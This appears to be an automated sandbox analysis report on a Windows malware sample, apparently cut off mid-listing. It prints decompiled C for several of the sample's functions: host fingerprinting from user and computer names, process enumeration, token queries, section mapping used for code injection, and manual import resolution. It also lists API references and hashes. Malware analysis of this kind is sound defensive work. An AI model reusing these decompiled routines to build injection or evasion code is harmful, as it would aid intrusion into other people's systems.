Part of subcall function 6E1A1825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1A1878

Part of subcall function 6E1A1000: HeapAlloc.KERNEL32(00000000,?,6E1A15ED,00000030,74E063F0,00000000), ref: 6E1A100C

NtQuerySystemInformation.NTDLL ref: 6E1A15FB
Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 6E1A1642
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1A1678
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1A1696
WaitForSingleObject.KERNEL32(00000000,000000FF,6E1A10B9,?,00000000), ref: 6E1A16CD
GetExitCodeThread.KERNELBASE(00000000,00000000), ref: 6E1A16DF
CloseHandle.KERNEL32(00000000), ref: 6E1A16E6
GetLastError.KERNEL32(6E1A10B9,?,00000000), ref: 6E1A16EE
GetLastError.KERNEL32 ref: 6E1A16FB

Strings

@Mt MtTt, xrefs: 6E1A16BE

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
String ID: @Mt MtTt
API String ID: 3479304935-608512568
Opcode ID: 5cdc8e574634d2ca6c070afd29e7b6556dba2fc3435f174893d1ba234021e445
Instruction ID: ea85ae84f40cd41cbd4e98b8420b51ee72d3e7dd5242cafd67b511f8f2e53a0b
Opcode Fuzzy Hash: 5cdc8e574634d2ca6c070afd29e7b6556dba2fc3435f174893d1ba234021e445
Instruction Fuzzy Hash: 5331C5F9E01615AAD710DBED8D44ABF7ABCEF46364F244122E614D3140DB70DA89ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B0A82B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B0A82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xb0d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00B060B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xb0d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xb0d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00B0789B(_v8 + _v8, _t64);
							}
							HeapFree( *0xb0d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xb0d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00B0789B(_v8 + _v8, _t64);
						}
						HeapFree( *0xb0d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x00b0a82b
0x00b0a833
0x00b0a837
0x00b0a83a
0x00b0a83f
0x00b0a841
0x00b0a846
0x00b0a846
0x00b0a84c
0x00b0a84e
0x00b0a85b
0x00b0a8bc
0x00b0a85d
0x00b0a862
0x00b0a868
0x00b0a86d
0x00b0a87b
0x00b0a87f
0x00b0a88e
0x00b0a895
0x00b0a89c
0x00b0a89c
0x00b0a8a7
0x00b0a8a7
0x00b0a87f
0x00b0a86d
0x00b0a8be
0x00b0a8c4
0x00b0a8ce
0x00b0a8d0
0x00b0a8d5
0x00b0a8e4
0x00b0a8e8
0x00b0a8f3
0x00b0a8fa
0x00b0a901
0x00b0a901
0x00b0a90d
0x00b0a90d
0x00b0a8e8
0x00b0a918
0x00b0a91a
0x00b0a91d
0x00b0a91f
0x00b0a922
0x00b0a925
0x00b0a92f
0x00b0a933
0x00b0a937

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00B0A862
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B0A879
GetUserNameW.ADVAPI32(00000000,?), ref: 00B0A886
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00B0538B), ref: 00B0A8A7
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00B0A8CE
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B0A8E2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00B0A8EF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00B0538B), ref: 00B0A90D

Strings

Ut, xrefs: 00B0A8A7, 00B0A90D

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: dc7381e64e1f52378db17097eb4a6eacd9a57132a2f403203c0af55c589db530
Instruction ID: 3a3635d0edfe9ea01ab34833e4d7b448debc44345cd87d29cbda8b1a2d16aaf2
Opcode Fuzzy Hash: dc7381e64e1f52378db17097eb4a6eacd9a57132a2f403203c0af55c589db530
Instruction Fuzzy Hash: 2331FB71A10305EFDB20DFA9DD81A6EBBF9FB58310F1585A9E505D32A0EB30EE059B11

Uniqueness

Uniqueness Score: -1.00%

Function 00B576B3, Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(0434B5B0,00000000,0000005C,?,?,?), ref: 00B576EF
_strupr.NTDLL ref: 00B57705
lstrlen.KERNEL32(0434B5B0,?,?), ref: 00B5770D
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 00B5778D
RtlAddVectoredExceptionHandler.NTDLL(00000000,00B65123), ref: 00B577B4
GetLastError.KERNEL32(?,?,?,?), ref: 00B577CE
RtlRemoveVectoredExceptionHandler.NTDLL(007EC6E8), ref: 00B577E4

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: bee3471fac76383a097c7bb94c25412612862533fef120506378af3be0336f3d
Instruction ID: 3973fc398d951a95f0334bfc2d197bda6b6a4fbb67303b1253320125c9ed6260
Opcode Fuzzy Hash: bee3471fac76383a097c7bb94c25412612862533fef120506378af3be0336f3d
Instruction Fuzzy Hash: 1A31C472A452655FDB10AFB8BC88F6A77DCE708712F1505E5EE22E3171DE248C8ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B05D10, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00B05D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00B075F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00B04AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00b05d1d
0x00b05d1e
0x00b05d1f
0x00b05d20
0x00b05d21
0x00b05d25
0x00b05d2c
0x00b05d3b
0x00b05d3e
0x00b05d41
0x00b05d48
0x00b05d4b
0x00b05d4e
0x00b05d51
0x00b05d54
0x00b05d5f
0x00b05d61
0x00b05d6a
0x00b05d72
0x00b05d74
0x00b05d86
0x00b05d90
0x00b05d94
0x00b05da3
0x00b05da7
0x00b05db0
0x00b05db8
0x00b05db8
0x00b05dba
0x00b05dba
0x00b05dc2
0x00b05dc8
0x00b05dcc
0x00b05dcc
0x00b05dd7

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00B05D57
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00B05D6A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00B05D86

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00B05DA3
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00B05DB0
NtClose.NTDLL(?), ref: 00B05DC2
NtClose.NTDLL(00000000), ref: 00B05DCC

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 475bfc84ad6f68fa68add26cfc57705cbb18e5a88ea8ed762b7e1a7388d59898
Instruction ID: e37260fc6a7037e95f73c2e84f21f32849ca3e4749dd1aff9033b7b1ac598273
Opcode Fuzzy Hash: 475bfc84ad6f68fa68add26cfc57705cbb18e5a88ea8ed762b7e1a7388d59898
Instruction Fuzzy Hash: FA2123B6900218BBDB019FA4CC45EDEBFBDEB08750F104162FA00E6161D7719A509BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B60DD9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 00B60E20
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 00B60E33
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 00B60E4F

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 00B60E6C
memcpy.NTDLL(?,00000000,0000001C), ref: 00B60E79
NtClose.NTDLL(?), ref: 00B60E8B
NtClose.NTDLL(?), ref: 00B60E95

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: f46272450a7cf38ed29eb2642a56c14f1569781bda662ae15d23bd39e6129376
Instruction ID: 88cc0bc505aee3f766d7d80efb361ad0925f98065d35b8dda6b79e7145b7c469
Opcode Fuzzy Hash: f46272450a7cf38ed29eb2642a56c14f1569781bda662ae15d23bd39e6129376
Instruction Fuzzy Hash: 2B2116B2911228FBDB11AF95CC45EDEBFBDEF08740F104066FA04E6121D7719A459FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B04A03, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B04A03() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xb0d2e0; // 0xdca5a8
						_t2 = _t9 + 0xb0ee3c; // 0x73617661
						_push( &_v264);
						if( *0xb0d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00b04a0e
0x00b04a13
0x00b04a18
0x00b04a1c
0x00b04a26
0x00b04a57
0x00b04a2d
0x00b04a32
0x00b04a3f
0x00b04a48
0x00b04a5f
0x00b04a4a
0x00b04a52
0x00000000
0x00b04a52
0x00b04a60
0x00b04a61
0x00000000
0x00b04a61
0x00000000
0x00b04a5b
0x00b04a67
0x00b04a6c

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B04A13
Process32First.KERNEL32(00000000,?), ref: 00B04A26
Process32Next.KERNEL32(00000000,?), ref: 00B04A52
CloseHandle.KERNEL32(00000000), ref: 00B04A61

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 83098cae9640038bd8d9e84c6162412f735a0cea48942c6bfcfa6ecc9ec889f7
Instruction ID: 7e654726c7dc46d521e12f104f26f422b06c3f20eb5dbe366a45a018f73f8375
Opcode Fuzzy Hash: 83098cae9640038bd8d9e84c6162412f735a0cea48942c6bfcfa6ecc9ec889f7
Instruction Fuzzy Hash: BFF096756001185AD720A766DD49DEB7AECDBD5714F0001E2FA16D3081EB20DA458AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A13B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1A13B8(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E1A1273(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e1a13c1
0x6e1a13c8
0x6e1a13c9
0x6e1a13ca
0x6e1a13cb
0x6e1a13cc
0x6e1a13dd
0x6e1a13e1
0x6e1a13f5
0x6e1a13f8
0x6e1a13fb
0x6e1a1402
0x6e1a1405
0x6e1a140c
0x6e1a140f
0x6e1a1412
0x6e1a1415
0x6e1a141a
0x6e1a1455
0x6e1a141c
0x6e1a141f
0x6e1a1425
0x6e1a142a
0x6e1a142e
0x6e1a144c
0x6e1a1430
0x6e1a1437
0x6e1a1445
0x6e1a1445
0x6e1a142e
0x6e1a145d

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 6E1A1415

Part of subcall function 6E1A1273: NtMapViewOfSection.NTDLL(00000000,000000FF,6E1A142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E1A142A,?), ref: 6E1A12A0

memset.NTDLL ref: 6E1A1437

Strings

@, xrefs: 6E1A1405

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
Instruction ID: 0e219848f4331cd12c76846a8665d8e921a1f8d17ef2f6c9d5f47920fd6acb77
Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
Instruction Fuzzy Hash: DA21FCB5E00209AFDB11CFE9C8849EEFBB9EB48354F108529E655F3210D7309A489BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B645D7, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000318), ref: 00B645FC
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B64618

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

Part of subcall function 00B6D103: GetProcAddress.KERNEL32(?,00000000), ref: 00B6D12C
Part of subcall function 00B6D103: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00B64659,00000000,00000000,00000028,00000100), ref: 00B6D14E

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00B64782

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: b8d76d364ba32f52787da51997fd35b860bfae57b996d0945f23a49b34a20b3d
Instruction ID: 96e24e061ac9a5f10eb6e4224f08cb6d3898060fa4809827d228220166a3f686
Opcode Fuzzy Hash: b8d76d364ba32f52787da51997fd35b860bfae57b996d0945f23a49b34a20b3d
Instruction Fuzzy Hash: 74614D75A0061AAFDB14DFA4D880BEEB7F4FF09300F0045A9E914AB251DB74EE55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D5B8, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B5D5CC
GetProcAddress.KERNEL32(?), ref: 00B5D5F4
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 00B5D612

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 1ebe2a53729c00f8dda26c002dd2d28de32d67eb19dbb29732848840dd45e3f2
Instruction ID: 2f2d4f790e35fb1fc7fe0dd390ea0ce1f95fb279e9b1a6cd488599b3e36cd9bb
Opcode Fuzzy Hash: 1ebe2a53729c00f8dda26c002dd2d28de32d67eb19dbb29732848840dd45e3f2
Instruction Fuzzy Hash: 69112E35A01219AFDB10DF98DC45FA97BE9EB44745F0541A4FD08EB2A0EB70AD0ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1DE5, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1DE5(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e1a41c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e1a1de5
0x6e1a1dee
0x6e1a1df3
0x6e1a1df9
0x6e1a1e02
0x6e1a1e08
0x6e1a1e0a
0x6e1a1e0d
0x6e1a1e12
0x6e1a1e19
0x6e1a1e19
0x6e1a1e1d
0x6e1a1e23
0x6e1a1e28
0x00000000
0x00000000
0x6e1a1e2e
0x6e1a1e38
0x6e1a1e3a
0x6e1a1e3d
0x6e1a1e40
0x6e1a1e44
0x6e1a1e4c
0x6e1a1e4e
0x6e1a1e51
0x6e1a1eb9
0x6e1a1eb9
0x6e1a1ebd
0x00000000
0x00000000
0x6e1a1e56
0x6e1a1e5c
0x6e1a1e5e
0x6e1a1e71
0x6e1a1e74
0x6e1a1e74
0x6e1a1e74
0x6e1a1e78
0x6e1a1e60
0x6e1a1e60
0x6e1a1e68
0x6e1a1e6a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a1e6a
0x6e1a1e58
0x6e1a1e58
0x6e1a1e6c
0x6e1a1e6c
0x6e1a1e6c
0x6e1a1e7b
0x6e1a1e7e
0x6e1a1e80
0x6e1a1e87
0x6e1a1e82
0x6e1a1e82
0x6e1a1e82
0x6e1a1e8f
0x6e1a1e95
0x6e1a1e97
0x6e1a1ec7
0x6e1a1e99
0x6e1a1e99
0x6e1a1e9c
0x6e1a1e9e
0x6e1a1ea6
0x6e1a1ea6
0x6e1a1eab
0x6e1a1ead
0x6e1a1eb4
0x6e1a1eb6
0x6e1a1eb6
0x6e1a1eb6
0x00000000
0x6e1a1eb6
0x00000000
0x6e1a1e97
0x6e1a1e46
0x6e1a1e46
0x6e1a1e4a
0x00000000
0x00000000
0x6e1a1e4a
0x6e1a1eca
0x6e1a1eca
0x6e1a1ed1
0x6e1a1ed6
0x00000000
0x00000000
0x6e1a1edc
0x6e1a1ee7
0x00000000
0x6e1a1ee7
0x6e1a1ede
0x6e1a1ede
0x6e1a1ee4
0x00000000
0x6e1a1ee4
0x6e1a1e12
0x6e1a1ee8
0x6e1a1eed

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1A1E1D
GetProcAddress.KERNEL32(?,00000000), ref: 6E1A1E8F

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 5bc6cebb6eab56c4f1e4fd9c8649a61db60695631313c9fbec983bb57ef2a7ff
Instruction ID: 3cb25dfba48509849e1602a748adb61a773ab3ba4fb6db640eeeee59678480a1
Opcode Fuzzy Hash: 5bc6cebb6eab56c4f1e4fd9c8649a61db60695631313c9fbec983bb57ef2a7ff
Instruction Fuzzy Hash: 69312AB9B00206DFDB46CF9DC890ABDB7F4BF15351B204069DA11EB240E730DA89EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B09269, Relevance: 3.1, APIs: 2, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B09269(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00B094E8(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00b09272
0x00b09279
0x00b0927a
0x00b0927b
0x00b0927c
0x00b0927d
0x00b0928e
0x00b09292
0x00b092a6
0x00b092a9
0x00b092ac
0x00b092b3
0x00b092b6
0x00b092bd
0x00b092c0
0x00b092c3
0x00b092c6
0x00b092cb
0x00b09306
0x00b092cd
0x00b092d0
0x00b092d6
0x00b092db
0x00b092df
0x00b092fd
0x00b092e1
0x00b092e8
0x00b092f6
0x00b092f6
